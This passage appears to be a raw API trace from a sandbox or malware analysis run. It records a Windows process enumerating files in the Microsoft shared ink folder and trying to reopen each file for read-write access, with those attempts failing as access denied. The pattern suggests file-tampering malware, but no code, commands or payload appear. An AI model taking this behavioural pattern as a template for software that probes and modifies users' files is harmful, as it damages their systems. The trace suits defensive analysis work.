0x7cf10 [0100.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.437] AreFileApisANSI () returned 1 [0100.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0100.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 57 [0100.437] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.437] GetLastError () returned 0x5 [0100.437] GetLastError () returned 0x5 [0100.437] SetLastError (dwErrCode=0x5) [0100.437] GetLastError () returned 0x5 [0100.437] SetLastError (dwErrCode=0x5) [0100.437] GetLastError () returned 0x5 [0100.438] SetLastError (dwErrCode=0x5) [0100.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0100.438] AreFileApisANSI () returned 1 [0100.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0100.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV") returned 57 [0100.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.438] GetLastError () returned 0x5 [0100.438] GetLastError () returned 0x5 [0100.438] SetLastError (dwErrCode=0x5) [0100.438] GetLastError () returned 0x5 [0100.438] SetLastError (dwErrCode=0x5) [0100.438] GetLastError () returned 0x5 [0100.438] SetLastError (dwErrCode=0x5) [0100.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0100.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0100.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0100.438] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0100.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.439] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.439] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.439] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.439] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0100.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0100.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.440] AreFileApisANSI () returned 1 [0100.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0100.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.440] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.440] AreFileApisANSI () returned 1 [0100.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85d00 [0100.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned 73 [0100.440] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.441] GetFileType (hFile=0x27c) returned 0x1 [0100.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0100.441] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.441] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.441] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.441] CloseHandle (hObject=0x27c) returned 1 [0100.441] AreFileApisANSI () returned 1 [0100.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0100.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui") returned 73 [0100.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.442] GetLastError () returned 0x5 [0100.442] GetLastError () returned 0x5 [0100.442] SetLastError (dwErrCode=0x5) [0100.442] GetLastError () returned 0x5 [0100.442] SetLastError (dwErrCode=0x5) [0100.442] GetLastError () returned 0x5 [0100.442] SetLastError (dwErrCode=0x5) [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0100.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.442] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d030, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.442] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0100.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.443] AreFileApisANSI () returned 1 [0100.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll", lpUsedDefaultChar=0x0) returned 62 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0100.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.443] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.443] AreFileApisANSI () returned 1 [0100.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e7a0 [0100.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll") returned 62 [0100.444] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.445] GetFileType (hFile=0x368) returned 0x1 [0100.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0100.445] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.445] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.445] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.445] CloseHandle (hObject=0x368) returned 1 [0100.445] AreFileApisANSI () returned 1 [0100.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ec68 [0100.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6ec68, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll") returned 62 [0100.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.446] GetLastError () returned 0x5 [0100.446] GetLastError () returned 0x5 [0100.446] SetLastError (dwErrCode=0x5) [0100.446] GetLastError () returned 0x5 [0100.446] SetLastError (dwErrCode=0x5) [0100.446] GetLastError () returned 0x5 [0100.446] SetLastError (dwErrCode=0x5) [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0100.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.446] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xc2004e62, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7b000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0100.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0100.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: 